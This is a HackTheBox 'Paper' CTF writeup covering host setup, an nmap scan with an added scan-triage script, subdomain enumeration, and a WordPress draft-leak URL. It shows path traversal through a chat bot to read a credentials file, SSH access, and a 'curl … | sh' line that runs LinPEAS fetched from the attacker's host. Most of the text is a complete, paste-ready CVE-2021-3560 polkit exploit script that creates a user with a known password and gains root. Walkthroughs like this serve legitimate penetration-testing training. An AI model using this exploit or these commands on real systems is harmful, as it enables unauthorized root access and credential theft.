
HackTheBox Paper Writeup

Tackle the HackTheBox Paper Capture The Flag (CTF) challenge, an easy-level journey through web exploitation, subdomain enumeration, RCE, and privilege escalation. This concise writeup provides clear steps to help you develop essential Linux security skills through practical exercises.

Add Hosts

Edit the /etc/hosts file and add the following entries:

10.10.11.143 paper.htb office.paper.htb chat.office.paper.htb

This ensures that your system resolves paper.htb and its subdomains to the target's IP address, 10.10.11.143.

Script to add hosts automatically

#!/usr/bin/env bash
ip="10.10.11.143"
domain="paper.htb office.paper.htb chat.office.paper.htb"
# Append the entry only if an identical line is not already present in /etc/hosts
grep -qF "$ip $domain" /etc/hosts || echo "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV paper.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-12 16:08 CEST
Nmap scan report for paper.htb (10.10.11.143)
Host is up (0.067s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_http-title: HTTP Server Test Page powered by CentOS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_ssl-date: TLS randomness does not represent time
| http-methods: 
|_  Potentially risky methods: TRACE
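The scan above is read by eye in the writeup. As an added example (not part of the original post), the following Python script parses that nmap -sCV output and flags the hardening findings it contains: the TRACE method, the stock CentOS test page, and a TLS certificate that is both expired and issued for localhost.localdomain rather than paper.htb. SCAN is a constructed, abridged copy of the output shown, and SCAN_DATE is the date from the scan header.

```python
import re
from datetime import datetime

# Constructed sample: an abridged copy of the nmap -sCV output quoted in this writeup.
SCAN = """\
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
|_Not valid after:  2022-07-08T10:32:34
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
"""
SCAN_DATE = datetime(2024, 9, 12)  # date printed in the scan header above

def parse_ports(text):
    """Group nmap -sCV lines into {port: {"service", "version", "scripts"}}."""
    ports, current = {}, None
    for line in text.splitlines():
        m = re.match(r"^(\d+/(?:tcp|udp))\s+open\s+(\S+)\s*(.*)$", line)
        if m:
            current = m.group(1)
            ports[current] = {"service": m.group(2), "version": m.group(3), "scripts": []}
        elif current and line.startswith("|"):
            # drop the "|", "|_" and indentation prefixes nmap puts on NSE script output
            ports[current]["scripts"].append(line.lstrip("|_ ").rstrip())
    return ports

def triage(ports, hostname, now):
    """Return (port, finding, detail) tuples a hardening review would raise."""
    issues = []
    for port, info in ports.items():
        for script in info["scripts"]:
            key, _, val = script.partition(":")
            val = val.strip()
            if key == "Potentially risky methods":
                issues.append((port, "risky-method", val))
            elif key == "http-title" and "Test Page" in val:
                issues.append((port, "default-page", val))  # stock install page exposed
            elif key == "Subject Alternative Name":
                names = [n.strip().removeprefix("DNS:") for n in val.split(",")]
                if hostname not in names:
                    issues.append((port, "cert-name-mismatch", ",".join(names)))
            elif key == "Not valid after" and datetime.fromisoformat(val) < now:
                issues.append((port, "cert-expired", val))
    return issues
```

Running `triage(parse_ports(SCAN), "paper.htb", SCAN_DATE)` yields six findings: TRACE and the default page on both 80/tcp and 443/tcp, plus the expired, mismatched certificate on 443/tcp.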

Subdomain Enumeration

While inspecting the traffic, the office.paper subdomain is discovered. Use gobuster to enumerate additional subdomains:

gobuster vhost -u office.paper -w /usr/share/dict/SecLists/Discovery/DNS/subdomains-top1million-110000.txt

Exploiting WordPress CVE-2019-17671

Visit the following URL to exploit a known vulnerability in WordPress:

http://office.paper/?static=1

The page it returns contains a registration link of the form http://chat.office.paper/register/xxxxxxxxxxxxxxxxx

Chat with the bot to explore further:

list ../../../home/dwight
file ../../../home/dwight/hubot/.env

Use the credentials found to SSH into the target:

ssh dwight@paper.htb
cat /home/dwight/user.txt

System Information Gathering with LinPEAS

Run LinPEAS to gather information for privilege escalation:

# On the attacking machine: download LinPEAS and serve it over HTTP
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
# Print the one-liner to run on the target (uses the VPN address on tun0)
tun0_ip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo "now on the target run -> curl $tun0_ip/linpeas.sh | sh"
sudo python3 -m http.server 80
# Clean up once the web server has been stopped
rm -f linpeas.sh

Exploiting CVE-2021-3560 for Privilege Escalation

Paste the following script into the shell to exploit the vulnerability:

RED='\033[0;31m'
GREEN='\033[0;32m'
BLUE='\033[0;34m'
NC='\033[0m'
USR="pwn"
PASS="root"
TIME=""
FORCE="y"
function fetch_timing(){
    exec 3>&1 4>&2
    out=$( { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$USR string:$USR int32:1 2>&1 >/dev/null 2>&4 1>&3; } 2>&1 )
    tmp=$(echo $out | grep -i "real" | awk -F '.' '{print $2}')
    tmp_timing=$(echo ${tmp:0:$((${#tmp}-10))})
    exec 3>&- 4>&-
    echo $tmp_timing  
}
function calculate_timing(){ 
    tmp_timing=$(echo $1)
    t=$(awk "BEGIN {print `echo $tmp_timing/2`}")
    echo $t
}
function insert_user(){
    time_fetched=$(fetch_timing)
    timing=$(calculate_timing `echo "0.$time_fetched"`)
    if [[ $TIME ]]; then
        t=$TIME
    else
        t=$timing
    fi
    while ! id "$USR" &>/dev/null; do
        dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$USR string:$USR int32:1 2>/dev/null & sleep `echo $t`s 2>/dev/null; kill $! 2>/dev/null
    done
    uid=$(id $USR | cut -d = -f2 | cut -d \( -f1)
    echo $uid,$t
}
function insert_pass(){
    ti=$(echo $1)
    u_id=$(echo $2)
    hash1=$(openssl passwd -5 `echo -n $PASS`)
    while true; do
        dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$u_id org.freedesktop.Accounts.User.SetPassword string:`echo -n $hash1` string:GoldenEye 2>/dev/null & sleep `echo $ti`s 2>/dev/null; kill $! 2>/dev/null
        if [ $? -eq 0 ]; then
            break
        fi
    done
}
function exploit(){
    while true; do
        echo -e "${BLUE}[!]${NC} Inserting Username $USR..."
        ret=$(insert_user)
        t=$(echo $ret | cut -d , -f2)
        uid=$(echo $ret | cut -d , -f1)
        if id "$USR" &>/dev/null; then
            echo -e "${GREEN}[+]${NC} Inserted Username $USR with UID $uid!"
            echo -e "${BLUE}[!]${NC} Inserting password hash..."
            insert_pass $t $uid
            echo -e "${BLUE}[!]${NC} Password insertion attempted!"
            echo -e "${BLUE}[!]${NC} Try to login as the injected user using 'su - $USR'"
            echo -e "${BLUE}[!]${NC} If login fails, run the exploit again."
            echo -e "${BLUE}[!]${NC} If successful, use 'sudo bash' to gain root access!"
            break
        else
            echo -e "${RED}[x]${NC} Insertion of Username failed! Retrying..."
        fi
    done
}
if [[ "$FORCE" == "y" ]]; then 
    exploit
else
    echo -e "${BLUE}[!]${NC} Starting Vulnerability Checks..."
    dist=$(cat /etc/os-release | grep ^ID= | cut -d = -f2 | grep -i 'centos\|rhel\|fedora\|ubuntu\|debian')
    echo -e "${BLUE}[!]${NC} Detected Linux distribution as $dist"
    ac_service=$(dpkg -l | grep -i accountsservice || rpm -qa | grep -i accountsservice)
    gc_center=$(dpkg -l | grep -i gnome-control-center || rpm -qa | grep -i gnome-control-center)
    if [[ $ac_service && $gc_center ]]; then
        echo -e "${GREEN}[+]${NC} Accounts service and Gnome-Control-Center Installation Found!"
        polkit=$(dpkg -l | grep -i polkit | grep -i "0.105-26" || rpm -qa | grep -i polkit | grep -i '0.11[3-9]')
        if [[ $polkit ]]; then
            echo -e "${GREEN}[+]${NC} Polkit version appears to be vulnerable!"
            exploit
        else
            echo -e "${RED}[x]${NC} ERROR: Polkit version is not vulnerable!"
            echo -e "${BLUE}[!]${NC} Aborting Execution!"
            echo -e "${BLUE}[!]${NC} Use '-f=y' flag to force exploit."
        fi
    else
        echo -e "${RED}[x]${NC} ERROR: Accounts service and Gnome-Control-Center NOT found!"
        echo -e "${BLUE}[!]${NC} Aborting Execution!"
    fi
fi

After exploiting, check the root flag:

cat /root/root.txt

This post is licensed under CC BY 4.0 by the author.